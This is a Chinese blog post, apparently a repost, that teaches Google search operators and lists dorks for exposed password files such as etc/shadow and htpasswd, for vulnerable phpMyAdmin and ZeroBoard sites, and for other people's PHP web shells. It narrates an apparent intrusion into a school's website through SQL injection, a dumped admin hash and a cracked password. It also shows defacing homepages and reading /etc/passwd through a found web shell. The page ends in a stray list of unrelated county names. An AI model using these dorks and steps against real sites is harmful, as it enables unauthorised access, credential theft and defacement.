posts - 15,  comments - 8,  trackbacks - 0
          Google hacking其實并算不上什么新東西,當(dāng)時并沒有重視這種技術(shù),認(rèn)為webshell什么的,并無太大實際用途.Google hacking其實并非如此簡單...

          Google hacking的簡單實現(xiàn)
          使用Google中的一些語法可以提供給我們更多的信息(當(dāng)然也提供給那些習(xí)慣攻擊的人更多他們所想要的.),下面就來介紹一些常用的語法.
          intext:
          這個就是把網(wǎng)頁中的正文內(nèi)容中的某個字符做為搜索條件.例如在Google里輸入:intext:動網(wǎng).將返回所有在網(wǎng)頁正文部分包含"動網(wǎng)"的網(wǎng)頁

          .allintext:使用方法和intext類似.

          intitle:
          和上面那個intext差不多,搜索網(wǎng)頁標(biāo)題中是否有我們所要找的字符.例如搜索:intitle:安全天使.將返回所有網(wǎng)頁標(biāo)題中包含"安全天使"的網(wǎng)頁.同理allintitle:也同intitle類似.

          cache:
          搜索Google里關(guān)于某些內(nèi)容的緩存,有時候也許能找到一些好東西哦.

          define:
          搜索某個詞語的定義,搜索:define:hacker,將返回關(guān)于hacker的定義.

          filetype:
          這個我要重點(diǎn)推薦一下,無論是撒網(wǎng)式攻擊還是我們后面要說的對特定站點(diǎn)搜索指定類型的文件.
          例如輸入:filetype:doc.將返回所有以doc結(jié)尾的文件URL.當(dāng)然如果你找.bak、.mdb或.inc也是可以的,獲得的信息也許會更豐富

          info:
          查找指定站點(diǎn)的一些基本信息.

          inurl:
          搜索我們指定的字符是否存在于URL中.例如輸入:inurl:admin,將返回N個類似于這樣的連接:http://www.xxx.com/xxx/admin,用來找管理員登

          陸的URL不錯.allinurl也同inurl類似,可指定多個字符.

          link:
          例如搜索:inurl:www.4ngel.net可以返回所有和www.4ngel.net做了鏈接的URL.

          site:
          這個也很有用,例如:site:www.4ngel.net.將返回所有和4ngel.net這個站有關(guān)的URL.


          對了還有一些操作符也是很有用的:
          + 把Google可能忽略的字列如查詢范圍
          - 把某個字忽略
          ~ 同意詞
          . 單一的通配符
          * 通配符,可代表多個字母
          "" 精確查詢

          下面開始說說實際應(yīng)用

          以下內(nèi)容均在Google上搜索,對于一個居心叵測的攻擊者來說,可能他最感興趣的就是密碼文件了.而Google正因為其強(qiáng)大的搜索能力往往會把一些敏感信息透露給他們.
          用Google搜索以下內(nèi)容:
          intitle:"index of" etc
          intitle:"Index of" .sh_history
          intitle:"Index of" .bash_history
          intitle:"index of" passwd
          intitle:"index of" people.lst
          intitle:"index of" pwd.db
          intitle:"index of" etc/shadow
          intitle:"index of" spwd
          intitle:"index of" master.passwd
          intitle:"index of" htpasswd
          "# -FrontPage-" inurl:service.pwd
          有時候因為各種各樣的原因一些重要的密碼文件被毫無保護(hù)的暴露在網(wǎng)絡(luò)上,如果被別有用心的人獲得,那么危害是很大的

          同樣可以用Google來搜索一些具有漏洞的程序,例如ZeroBoard前段時間發(fā)現(xiàn)個文件代碼泄露漏洞,可以用Google來找網(wǎng)上使用這套程序的站點(diǎn):
          intext:ZeroBoard filetype:php
          或者使用:
          inurlutlogin.php?_zb_path= site:.jp
          來尋找我們所需要的頁面.phpmyadmin是一套功能強(qiáng)大的數(shù)據(jù)庫操作軟件,一些站點(diǎn)由于配置失誤,導(dǎo)致我們可以不使用密碼直接對phpmyadmin進(jìn)行操作.
          我們可以用Google搜索存在這樣漏洞的程序URL:
          intitle:phpmyadmin intext:Create new database

          還記http://www.xxx.com/_vti_bin/..%5 ... ystem32/cmd.exe?dir嗎?用Google找找,你也許還可以找到很多

          古董級的機(jī)器。同樣我們可以用這個找找有其他cgi漏洞的頁面。
          allinurl:winnt system32

          前面已經(jīng)簡單的說過可以用Google來搜索數(shù)據(jù)庫文件,用上一些語法來精確查找能夠獲得更多東西(access的數(shù)據(jù)庫,mssql、mysql的連接文件等等).
          舉個例子示例一下:
          allinurl:bbs data
          filetype:mdb inurl:database
          filetype:inc conn
          inurl:data filetype:mdb
          intitle:"index of" data //在一些配置不正確的apache+win32的服務(wù)器上經(jīng)常出現(xiàn)這種情況,和上面的原理一樣,我們還可以用Google來找后臺.


          利用Google完全是可以對一個站點(diǎn)進(jìn)行信息收集和滲透的,下面我們用Google對特定站點(diǎn)進(jìn)行一次測試。
          首先用Google先看這個站點(diǎn)的一些基本情況(一些細(xì)節(jié)部分就略去了):
          site:xxxx.com
          從返回的信息中,找到幾個該校的幾個系院的域名:
          http://a1.xxxx.com
          http://a2.xxxx.com
          http://a3.xxxx.com
          http://a4.xxxx.com
          順便ping了一下,應(yīng)該是在不同的服務(wù)器.學(xué)校一般都會有不少好的資料,先看看有什么好東西沒

          site:xxxx.com filetype:doc
          得到N個不錯的doc。

          先找找網(wǎng)站的管理后臺地址:
          site:xxxx.com intext:管理
          site:xxxx.com inurl:login
          site:xxxx.com intitle:管理
          超過獲得2個管理后臺地址:
          http://a2.xxxx.com/sys/admin_login.asp
          http://a3.xxxx.com:88/_admin/login_in.asp

          還算不錯,看看服務(wù)器上跑的是什么程序:
          site:a2.xxxx.com filetype:asp
          site:a2.xxxx.com filetype:php
          site:a2.xxxx.com filetype:aspx
          site:a3.xxxx.com filetype:asp
          site:.......
          ......
          a2服務(wù)器用的應(yīng)該是IIS,上面用的是asp的整站程序,還有一個php的論壇
          a3服務(wù)器也是IIS,aspx+asp。web程序都應(yīng)該是自己開發(fā)的。有論壇那就看看能不能遇見什么公共的FTP帳號什么的:
          site:a2.xxxx.com intext:ftp://*:*
          沒找到什么有價值的東西。再看看有沒有上傳一類的漏洞:
          site:a2.xxxx.com inurl:file
          site:a3.xxxx.com inurl:load
          在a2上發(fā)現(xiàn)一個上傳文件的頁面:
          http://a2.xxxx.com/sys/uploadfile.asp
          用IE看了一下,沒權(quán)限訪問。試試注射,
          site:a2.xxxx.com filetype:asp
          得到N個asp頁面的地址,體力活就讓軟件做吧,這套程序明顯沒有對注射做什么防范,dbowner權(quán)限,雖然不高但已足矣,back a shell不太喜歡,而且看起來數(shù)據(jù)庫的個頭就不小,直接把web管理員的密碼暴出來再說,MD5加密過。一般學(xué)校的站點(diǎn)的密碼都比較有規(guī)律,通常都是域名+電話一類的變形,用Google搞定吧。
          site:xxxx.com //得到N個二級域名
          site:xxxx.com intext:*@xxxx.com //得到N個郵件地址,還有郵箱的主人的名字什么的
          site:xxxx.com intext:電話 //N個電話
          把什么的信息做個字典吧,掛上慢慢跑。過了一段時間就跑出4個帳號,2個是學(xué)生會的,1個管理員,還有一個可能是老師的帳號。登陸上去:
          name:網(wǎng)站管理員
          pass:a2xxxx7619 //說了吧,就是域名+4個數(shù)字
          要再怎么提權(quán)那就不屬于本文討論訪問了,呵呵,到此為止。

          這段時間在國外的一些Google hack的研究站點(diǎn)看了看,其實也都差不多是一些基本語法的靈活運(yùn)用,或者配合某個腳本漏洞,主要還是靠個人的靈活思維。國外對于Google hack方面的防范也并不是很多,所以大家還是點(diǎn)到為止,不要去搞破壞拉,呵呵。對于一些在win上跑
          apache的網(wǎng)管們應(yīng)該多注意一下這方面,一個intitle:index of就差不多都出來了
          1.查找利用php webshell

          intitle:"php shell*" "Enable stderr" filetype:php

          (注: intitle—網(wǎng)頁標(biāo)題 Enable stderr—UNIX標(biāo)準(zhǔn)輸出和標(biāo)準(zhǔn)錯誤的縮寫filetype—文件類型)。搜索結(jié)果中,你能找到很多直接在機(jī)器上執(zhí)行命令的web shell來。如果找到的PHPSHELL不會利用,如果你不熟悉UNIX,可以直接看看LIST,這里就不詳細(xì)說了,有很多利用價值。要說明的是,我們這里搜索出來的一些國外的PHPSHELL上都要使用UNIX命令,都是system調(diào)用出來的函數(shù)(其實用百度及其他搜索引擎都可以,只是填寫搜索的內(nèi)容不同)。

          這個PHPWEBSHELL是可以直接Echo(Unix常用命令)。一句話就把首頁搞定了:

          echo "召喚" > index.jsp

          現(xiàn)在看看首頁,已經(jīng)被我們改成: "召喚" 了。

          我們也可以用WGET上傳一個文件上去(比如你要替換的葉子吧)。然后execute Command輸入 cat file > index.html or echo "" > file echo "test" >> file

          這樣一條條打出來,站點(diǎn)首頁就成功被替換了。同樣的也可以

          uname -a;cat /etc/passwd

          不過有點(diǎn)要注意,有些WEBSHELL程序有問題,執(zhí)行不了的,

          2.搜索INC敏感信息

          在Google的搜索框中填入:

          Code:
          .org filetype:inc
          posted on 2009-09-28 14:53 lvq810 閱讀(160) 評論(0)  編輯  收藏 所屬分類: Other
          主站蜘蛛池模板: 姚安县| 庆城县| 万安县| 民乐县| 扶余县| 密山市| 定州市| 福贡县| 都匀市| 金坛市| 英吉沙县| 永福县| 巢湖市| 小金县| 梅河口市| 吴旗县| 依兰县| 东丰县| 微山县| 夏邑县| 成武县| 峡江县| 彭山县| 江达县| 蒲江县| 民县| 余姚市| 辽阳市| 恭城| 斗六市| 习水县| 灌阳县| 庆云县| 兴义市| 搜索| 新宾| 团风县| 新竹县| 松阳县| 靖远县| 临泉县|